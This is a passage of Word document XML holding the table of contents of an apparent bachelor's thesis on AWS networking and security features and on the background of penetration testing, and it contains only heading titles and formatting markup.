        <w:p w14:paraId="3407EB4D" w14:textId="1D7CF495" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00D77DFE">
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00D77DFE">
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00D77DFE">
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc223521071" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Bachelor’s Thesis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w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2EDAC1EA" w14:textId="1EA859A7" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521072" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DECLARATION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w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="194DF8CA" w14:textId="57AFA8CC" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521073" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:i/>
                <w:noProof/>
              </w:rPr>
              <w:t>List of Abbreviations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6</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5F4E1B7F" w14:textId="4DB4ACF7" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521074" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:i/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1. INTRODUCTION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w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5281C73B" w14:textId="1B5299D2" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521075" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1 Background and Related Work</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w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="57C4F215" w14:textId="1E8F2F11" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521076" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:i/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2 Problem Statement</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w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3987ECB1" w14:textId="7AF18244" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521077" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:i/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3 Project Objectives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w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E900CB5" w14:textId="329AC2F7" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521078" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:i/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1.4 Solving Problem</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8</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="67443D64" w14:textId="1CD5F8B5" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2" w:rsidP="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:ind w:left="0"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521079" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:i/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2. AWS: THEORETICAL BACKGROUND</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_Toc223521079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8</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3FF403AA" w14:textId="06A94017" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521080" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:i/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2.1 Introduction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8</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0F3D5E89" w14:textId="468E5853" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521081" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:i/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2.2 What is cloud computing?</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9</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="40607613" w14:textId="589D42D3" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521082" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:i/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2.3 Infrastructure as a Service</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9</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4F9E9B9B" w14:textId="00808F7B" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521083" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:i/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4 AWS Security Capabilities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9</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12C467F2" w14:textId="162ABDF7" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521084" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:i/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.5 Virtual Private Cloud (VPC)</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10</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="13D47234" w14:textId="557F81C3" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521085" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:i/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.6 Subnets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10</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="582DECB6" w14:textId="3A9461ED" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521086" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:i/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.7 EC2 Instances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11</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="74DEE851" w14:textId="105D9581" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521087" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:i/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.8 Security Groups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11</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="26836257" w14:textId="53143884" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521088" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:i/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.9 Network ACLs (NACLs)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11</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="19606146" w14:textId="41488E35" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521089" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:i/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.10 Route Tables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_Toc223521089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12</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="218080B7" w14:textId="4C096D57" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521090" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:i/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.11 Internet Gateway (IGW)</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12</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="59D6AE7E" w14:textId="46AF77BE" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521091" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>3. PENETRATION TESTING - THEORETICAL BACKGROUND</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12</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1BF0F297" w14:textId="6E277286" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521092" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:i/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1 Introduction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12</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="05974408" w14:textId="08F179FE" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521093" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:i/>
                <w:noProof/>
